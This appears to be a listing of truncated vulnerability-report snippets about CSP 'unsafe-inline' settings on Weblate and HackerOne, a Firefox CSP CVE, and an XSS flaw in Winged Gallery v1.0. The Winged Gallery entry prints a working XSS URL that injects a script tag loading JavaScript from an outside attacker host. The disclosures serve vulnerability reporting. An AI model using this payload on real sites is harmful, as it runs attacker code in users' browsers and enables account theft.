Weblate: CSP "script-src" includes "unsafe-inline" in weblate.org and demo.weblate.org

Weblate is using unsafe-inline in script-src csp headers which allows the use of inline resources, such as inline elements, javascript: URLs, inline event handlers, and inline elements. POC: HTTP/1.1 200 OK Server: nginx Date: Tue, 23 May 2017 10:49:15 GMT Content-Type: text/html; charset=utf-8...

HackerOne: www.hackerone.com website CSP "script-src" includes "unsafe-inline"

Summary: The HTTP header of the hackerone.com website includes an unsafe CSP parameter for "script-src". Description: The hackerone.com website https://www.hackerone.com has a Content-Security-Policy configured, as pointed out on the Bug Bounty page of their program: We utilize a strict Content...

CVE-2014-1485

The Content Security Policy CSP implementation in Mozilla Firefox before 27.0 and SeaMonkey before 2.24 operates on XSLT stylesheets according to style-src directives instead of script-src directives, which might allow remote attackers to execute arbitrary XSLT code by leveraging insufficient...

Winged Gallery v1.0

Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...